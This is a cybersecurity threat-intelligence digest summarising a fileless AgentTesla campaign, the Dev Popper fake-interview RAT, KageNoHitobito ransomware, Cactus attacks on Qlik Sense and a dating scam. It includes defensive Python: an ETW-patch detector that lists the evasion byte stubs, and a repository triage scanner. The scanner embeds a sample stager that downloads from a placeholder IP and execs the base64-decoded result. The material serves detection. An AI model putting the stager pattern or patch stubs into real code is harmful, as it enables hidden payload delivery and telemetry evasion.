Cyware Daily Threat Intelligence, April 29, 2024

Despite earlier warnings and disclosures, the Cactus ransomware group is still exploiting vulnerabilities in Qlik Sense, and thousands of internet-exposed servers remain unpatched. A new campaign dubbed Dev Popper, likely of North Korean origin, tricks developers with fake job interviews and turns the candidate's trust in the recruitment process into a Python RAT infection. Ransomware pressure on Windows users has grown with the discovery of KageNoHitobito, a new strain distributed as legitimate software or game cheats.

Finding love online has its perils. The FBI warned that fraudsters are targeting online daters with fake verification apps, tricking them into divulging personal information that feeds identity theft and financial scams.

Top Malware Reported in the Last 24 Hours


Advanced fileless malware campaign detected
A sophisticated campaign uses a VBA macro to download and run a 64-bit Rust binary that carries out the rest of the infection without leaving the payload on disk. The binary first patches EtwEventWrite so the process stops emitting Event Tracing for Windows telemetry, then downloads shellcode. The shellcode resolves the Windows APIs it needs at run time, decrypts the embedded payload and runs it in memory; the final stage is AgentTesla, a .NET stealer loaded through CLR hosting rather than dropped as a file.
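The EtwEventWrite patch described above is detectable from inside the victim process, because it overwrites a function prologue whose bytes are known. The Python below is an added example, not code from the original page or from the reported campaign; `classify_prologue`, `read_live_prologue` and the sample byte strings are this example's own, and the "clean" prologue bytes are illustrative rather than taken from a specific ntdll build.

```python
"""Check whether an ETW/AMSI-style API entry point has been patched in memory.

Added example, not from the original page or the reported malware. The patch
stubs listed below are the ones evasion code commonly writes over
EtwEventWrite (or AmsiScanBuffer) to make the call return without doing
anything; the sample byte strings are constructed for this demo.
"""
import sys
from typing import Optional

# Short x64 stubs that make a function return immediately, plus the start of
# an inline hook (jmp rel32), which also means the prologue was rewritten.
PATCH_SIGNATURES = {
    "ret": b"\xc3",
    "xor eax,eax; ret": b"\x33\xc0\xc3",
    "xor eax,eax; ret (alt encoding)": b"\x31\xc0\xc3",
    "mov eax,0; ret": b"\xb8\x00\x00\x00\x00\xc3",
    "jmp rel32 (inline hook)": b"\xe9",
}


def classify_prologue(prologue: bytes, reference: Optional[bytes] = None) -> dict:
    """Return a verdict for the first bytes of a function.

    prologue  -- bytes read from the function's address in the live process
    reference -- the same bytes from a trusted copy (for example the on-disk
                 ntdll.dll mapped at the same RVA), if the caller has them
    """
    verdict = {"patched": False, "pattern": None, "first_diff": None}
    for name, sig in PATCH_SIGNATURES.items():
        if prologue.startswith(sig):
            verdict["patched"] = True
            verdict["pattern"] = name
            break
    if reference is not None:
        # A byte-for-byte comparison catches patches that use none of the
        # signatures above (a NOP sled, a changed branch, a longer stub).
        for i, (a, b) in enumerate(zip(prologue, reference)):
            if a != b:
                verdict["patched"] = True
                verdict["first_diff"] = i
                break
    return verdict


def read_live_prologue(module: str, func: str, n: int = 8) -> bytes:
    """Read the first n bytes of an exported function in this process.

    Windows only: resolves the export through ctypes and reads it directly.
    A patch applied before this code runs is still visible because the check
    compares bytes, not behaviour.
    """
    if sys.platform != "win32":
        raise OSError("live read requires Windows")
    import ctypes
    addr = ctypes.cast(getattr(ctypes.WinDLL(module), func), ctypes.c_void_p).value
    return ctypes.string_at(addr, n)


# Constructed samples. CLEAN is an illustrative, not build-specific, start of
# EtwEventWrite (mov r11,rsp ; sub rsp,0x58); the others overwrite its start.
CLEAN = bytes.fromhex("4c8bdc4883ec58")
PATCHED_RET = b"\xc3" + CLEAN[1:]
PATCHED_XOR = b"\x33\xc0\xc3" + CLEAN[3:]


if __name__ == "__main__":
    for label, sample in (("clean", CLEAN), ("ret", PATCHED_RET), ("xor", PATCHED_XOR)):
        print(label, classify_prologue(sample, CLEAN))
    if sys.platform == "win32":
        live = read_live_prologue("ntdll", "EtwEventWrite")
        print("live EtwEventWrite", live.hex(), classify_prologue(live))
```

Pass a reference copy whenever you have one: the signature list only covers the usual stubs, while the byte comparison flags any change. A check run from inside the process can itself be tampered with by malware that is already there, so an EDR performs the equivalent from the kernel or via ReadProcessMemory from a separate, protected process.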

Python RAT delivered via Fake job offers
A new campaign dubbed "Dev Popper" tricks software developers with fake job interviews and ends with a Python RAT on the victim's machine. Likely run by North Korean actors, it relies on multi-stage social engineering: during the interview, candidates are asked to run code from a GitHub repository as a coding task, which silently installs the RAT. Once running, the trojan collects system information and gives the operators remote access. Any interview that requires executing unreviewed code should be treated as hostile; read the code first and, if it must run, run it in a disposable VM with no access to credentials or source.
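Dev Popper depends on the candidate running unreviewed code, so the practical defence is to triage the repository before anything executes. The script below is an added example, not code from the original page or from the campaign; the rules, the `Finding` type, `scan_text`, `scan_tree`, `verdict` and the two sample files are this example's own constructions and are generic heuristics for downloader-style code, not Dev Popper signatures.

```python
"""Static triage of an untrusted 'interview task' repository before running it.

Added example, not from the original page or from the Dev Popper campaign.
The rules are generic heuristics for downloader-style code (decode-then-exec,
network fetch, dynamic import, writes to hidden paths, oversized opaque
literals); the two sample files are constructed for the demo.
"""
import os
import re
from dataclasses import dataclass


@dataclass
class Finding:
    path: str
    line: int
    rule: str
    snippet: str


# Rule name -> compiled regex, matched line by line. These flag patterns that
# a legitimate take-home task almost never needs; each hit is a reason to read
# the surrounding code before executing anything.
RULES = {
    "decode-then-exec": re.compile(
        r"\b(exec|eval)\s*\(.*\b(b64decode|unhexlify|zlib\.decompress|atob|Buffer\.from)\b"),
    "network-fetch": re.compile(
        r"\b(urllib\.request\.urlopen|requests\.(get|post)|http\.client|"
        r"socket\.connect|child_process|fetch\s*\()"),
    "dynamic-import": re.compile(
        r"__import__\s*\(|importlib\.import_module\s*\(|require\s*\(\s*[^'\"\s)]"),
    "hidden-path-write": re.compile(
        r"(%APPDATA%|/tmp/\.|expanduser\s*\(\s*['\"]~/\.|homedir\(\)\s*\+\s*['\"]/\.)"),
    # 200+ chars of base64 alphabet in one literal is the usual shape of an
    # embedded second stage.
    "long-opaque-literal": re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]"),
}
HARD_STOP = {"decode-then-exec", "network-fetch"}
SOURCE_EXT = {".py", ".js", ".mjs", ".cjs", ".ts", ".sh"}
SKIP_DIRS = {".git", "node_modules", "__pycache__"}


def scan_text(path: str, text: str) -> list[Finding]:
    """Run every rule over each line of one file."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for rule, rx in RULES.items():
            if rx.search(line):
                findings.append(Finding(path, no, rule, line.strip()[:80]))
    return findings


def scan_tree(root: str) -> list[Finding]:
    """Walk a checked-out repository and scan every source-like file."""
    out = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for fn in filenames:
            if os.path.splitext(fn)[1].lower() in SOURCE_EXT:
                full = os.path.join(dirpath, fn)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    out.extend(scan_text(os.path.relpath(full, root), fh.read()))
    return out


def verdict(findings: list[Finding]) -> str:
    """'block' on a hard indicator, 'review' on softer ones, else 'clean'."""
    rules = {f.rule for f in findings}
    if rules & HARD_STOP:
        return "block"
    return "review" if rules else "clean"


# Constructed samples (not real Dev Popper code): a harmless helper and a
# fetch-decode-exec stager of the kind a fake coding task would hide.
BENIGN = "import json\n\ndef load(path):\n    with open(path) as fh:\n        return json.load(fh)\n"
DROPPER = (
    "import base64, urllib.request\n"
    "blob = urllib.request.urlopen('http://203.0.113.10/stage2.txt').read()\n"
    "exec(base64.b64decode(blob))\n"
)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                       # python triage.py /path/to/clone
        hits = scan_tree(sys.argv[1])
    else:                                       # demo on the embedded samples
        hits = scan_text("ok.py", BENIGN) + scan_text("task.py", DROPPER)
    for h in hits:
        print(f"{h.path}:{h.line} [{h.rule}] {h.snippet}")
    print("verdict:", verdict(hits))
```

A clean verdict is not a guarantee: the rules are line-based and will miss code split across lines or built from string concatenation, and a package's install hooks (npm `preinstall`, `setup.py`) run before you ever open the source. The point is to refuse to execute anything that trips a hard-stop rule and to read everything else in an isolated environment first.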

New Windows ransomware menace
KageNoHitobito is a newly discovered ransomware targeting Windows users worldwide. It is believed to spread through file-sharing services, packaged as legitimate software or game cheats, and it deliberately skips critical system files so the machine keeps working after encryption. Victims are directed to a Tor site and negotiate through the AbleOnion chat platform.

Top Vulnerabilities Reported in the Last 24 Hours


Cactus ransomware exploits Qlik Sense flaws
Months after Qlik disclosed security flaws in Qlik Sense, Cactus ransomware is still abusing them for initial access. The flaws, disclosed in August and September 2023, allow remote code execution. Despite prior warnings, thousands of Qlik Sense servers remain vulnerable: Fox-IT's internet-wide scan found more than 3,000 still exposed to Cactus, 122 of which showed signs of compromise. Patching is urgent, but an exposed server should also be checked for an existing foothold, since applying the update does not evict an attacker who is already inside.

Top Scams Reported in the Last 24 Hours


Scammers exploit dating app users
The FBI warned of a new scam targeting users of online dating platforms. Fraudsters move the conversation off the platform and offer a fake "verification" process, supposedly to prove the other party is safe. Victims enter personal and financial details and are eventually redirected to a paid dating site whose recurring fees the scammers collect, on top of the stolen data. The scheme mirrors pig-butchering tactics in its slow build-up of trust. The FBI advises against moving conversations off reputable sites.

Tags

cactus ransomware
agenttesla
kagenohitobito
dev popper
online dating platform
qlik sense

Posted on: April 29, 2024

